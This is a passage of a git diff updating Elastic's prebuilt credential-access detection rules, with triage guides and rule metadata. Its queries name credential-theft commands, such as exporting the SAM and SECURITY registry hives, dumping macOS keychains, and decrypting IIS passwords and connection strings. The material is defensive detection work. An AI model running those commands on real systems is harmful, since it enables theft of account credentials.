aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the credential material was exfiltrated or processed locally by other tools.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- Administrators can export registry hives for backup purposes using command line tools like `reg.exe`. Check whether\nthe user is legitamitely performing this kind of activity.\n\n### Related rules\n\n- Registry Hive File Creation via SMB - a4c7473a-5cb4-4bc1-9d06-e4a75adbc494\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.pe.original_file_name == \"reg.exe\" and\n process.args : (\"save\", \"export\") and\n process.args : (\"hklm\\\\sam\", \"hklm\\\\security\")\n", "references": [ "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-the-registry-7512674487f8" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a7e7bfa3-088e-4f13-b29e-3986e0e756b8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -58,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json index bb513cbebdc3f..32416c0471685 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_hashes_bi_cmds.json @@ -16,6 +16,28 @@ "https://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored", "https://www.unix.com/man-page/osx/8/mkpassdb/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "02ea4563-ec10-4974-b7de-12e65aa4f9b3", "severity": "high", @@ -45,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json index 7b8e3af679113..7465b9105e653 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_dumping_keychain_security.json @@ -11,13 +11,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Dumping of Keychain Content via Security Command", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.args : \"dump-keychain\" and process.args : \"-d\"\n", "references": [ "https://ss64.com/osx/security.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -52,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_detected.json new file mode 100644 index 0000000000000..5e0c29fd41d2f --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_detected.json @@ -0,0 +1,78 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame detected Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Credential Dumping - Detected - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "571afc56-5ed9-465d-a2a9-045f099f6e7e", + "severity": "high", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_prevented.json new file mode 100644 index 0000000000000..e64338c07ec81 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_endgame_cred_dumping_prevented.json @@ -0,0 +1,78 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented Credential Dumping. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Credential Dumping - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:cred_theft_event or endgame.event_subtype_full:cred_theft_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "db8c33a8-03cd-4988-9e2c-d0a4863adb13", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json index b66008c6931a4..913411f50f3fa 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iam_user_addition_to_group.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM User Addition to Group", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM User Addition to Group\n\nAWS Identity and Access Management (IAM) provides fine-grained access control across all of AWS. With IAM, you can specify\nwho can access which services and resources, and under which conditions. With IAM policies, you manage permissions to\nyour workforce and systems to ensure least-privilege permissions.\n\nThis rule looks for the addition of users to a specified user group.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher\nconfidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions \u2014 to\nreduce noise from onboarding processes and administrator activities.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other\nIAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:AddUserToGroup and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserToGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "333de828-8190-4cf5-8d7c-7575846f6fe0", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,7 +59,9 @@ "AWS", "Continuous Monitoring", "SecOps", - "Identity and Access" + "Identity and Access", + "Credential Access", + "Persistence" ], "threat": [ { @@ -59,5 +91,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json index 1b10f96fc54ee..77016e0b893c9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_apppoolsa_pwd_appcmd.json @@ -13,13 +13,36 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Microsoft IIS Service Account Password Dumped", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"appcmd.exe\" or process.pe.original_file_name == \"appcmd.exe\") and \n process.args : \"/list\" and process.args : \"/text*password\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"appcmd.exe\" or process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/list\" and process.args : \"/text*password\"\n", "references": [ "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json index cb091a5eb2ccd..e3cbeae69dbc3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_iis_connectionstrings_dumping.json @@ -13,14 +13,37 @@ "license": "Elastic License v2", "max_signals": 33, "name": "Microsoft IIS Connection Strings Decryption", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"aspnet_regiis.exe\" or process.pe.original_file_name == \"aspnet_regiis.exe\") and\n process.args : \"connectionStrings\" and process.args : \"-pdf\"\n", "references": [ "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c25e9c87-95e1-4368-bfab-9fd34cf867ec", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -48,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json index 51ae6106124a3..0e6fe41e03d2e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberoasting_unusual_process.json @@ -15,10 +15,48 @@ "language": "eql", "license": "Elastic License v2", "name": "Kerberos Traffic from Unusual Process", - "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for\nclient/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of\ntraffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of\nKerberos tickets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a\nnon-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "network where event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and\n process.executable != \"C:\\\\Windows\\\\System32\\\\lsass.exe\" and destination.address !=\"127.0.0.1\" and destination.address !=\"::1\" and\n /* insert false positives here */\n not process.name in (\"swi_fc.exe\", \"fsIPcam.exe\", \"IPCamera.exe\", \"MicrosoftEdgeCP.exe\", \"MicrosoftEdge.exe\", \"iexplore.exe\", \"chrome.exe\", \"msedge.exe\", \"opera.exe\", \"firefox.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Kerberos Traffic from Unusual Process\n\nKerberos is the default authentication protocol in Active Directory, designed to provide strong authentication for\nclient/server applications by using secret-key cryptography.\n\nDomain-joined hosts usually perform Kerberos traffic using the `lsass.exe` process. This rule detects the occurrence of\ntraffic on the Kerberos port (88) by processes other than `lsass.exe` to detect the unusual request and usage of\nKerberos tickets.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the Destination IP is related to a Domain Controller.\n- Review event ID 4769 for suspicious ticket requests.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule uses a Kerberos-related port but does not identify the protocol used on that port. HTTP traffic on a\nnon-standard port or destination IP address unrelated to Domain controllers can create false positives.\n- Exceptions can be added for noisy/frequent connections.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n - Ticket requests can be used to investigate potentially compromised accounts.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "network where event.type == \"start\" and network.direction : (\"outgoing\", \"egress\") and\n destination.port == 88 and source.port >= 49152 and\n not process.executable :\n (\"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"System\",\n \"\\\\device\\\\harddiskvolume?\\\\windows\\\\system32\\\\lsass.exe\",\n \"?:\\\\Program Files\\\\rapid7\\\\nexpose\\\\nse\\\\.DLLCACHE\\\\nseserv.exe\",\n \"?:\\\\Program Files (x86)\\\\GFI\\\\LanGuard 12 Agent\\\\lnsscomm.exe\",\n \"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Nmap\\\\nmap.exe\",\n \"\\\\device\\\\harddiskvolume?\\\\program files (x86)\\\\nmap\\\\nmap.exe\") and\n destination.address !=\"127.0.0.1\" and destination.address !=\"::1\" and\n /* insert false positives here */\n not process.name in (\"swi_fc.exe\", \"fsIPcam.exe\", \"IPCamera.exe\", \"MicrosoftEdgeCP.exe\", \"MicrosoftEdge.exe\", \"iexplore.exe\", \"chrome.exe\", \"msedge.exe\", \"opera.exe\", \"firefox.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.address", + "type": "keyword" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json index 3338895f30feb..80aa0ff7043b4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_kerberosdump_kcc.json @@ -2,7 +2,7 @@ "author": [ "Elastic" ], - "description": "Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets.", + "description": "Identifies the use of the Kerberos credential cache (kcc) utility to dump locally cached Kerberos tickets. Adversaries may attempt to dump credential material in the form of tickets that can be leveraged for lateral movement.", "from": "now-9m", "index": [ "auditbeat-*", @@ -16,6 +16,28 @@ "https://github.com/EmpireProject/EmPyre/blob/master/lib/modules/collection/osx/kerberosdump.py", "https://opensource.apple.com/source/Heimdal/Heimdal-323.12/kuser/kcc-commands.in.auto.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "ad88231f-e2ab-491c-8fc6-64746da26cfe", "severity": "high", @@ -57,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json index 8efd74d4e7f1c..abf7cbece0b36 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_key_vault_modified.json @@ -14,14 +14,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Key Vault Modified", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.KEYVAULT/VAULTS/WRITE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/key-vault/general/basic-concepts", "https://docs.microsoft.com/en-us/azure/key-vault/general/secure-your-key-vault" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "792dd7a6-7e00-4a0a-8a9a-a7c24720b5ec", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -57,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json index b2c42f6b50d92..a7d9fe76a21c6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_keychain_pwd_retrieval_security_cmd.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Keychain Password Retrieval via Command Line", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.name : \"security\" and process.args : \"-wa\" and process.args : (\"find-generic-password\", \"find-internet-password\") and\n process.args : (\"Chrome*\", \"Chromium\", \"Opera\", \"Safari*\", \"Brave\", \"Microsoft Edge\", \"Edge\", \"Firefox*\") and\n not process.parent.executable : \"/Applications/Keeper Password Manager.app/Contents/Frameworks/Keeper Password Manager Helper*/Contents/MacOS/Keeper Password Manager Helper*\"\n", "references": [ "https://www.netmeister.org/blog/keychain-passwords.html", @@ -22,8 +22,31 @@ "https://ss64.com/osx/security.html", "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": 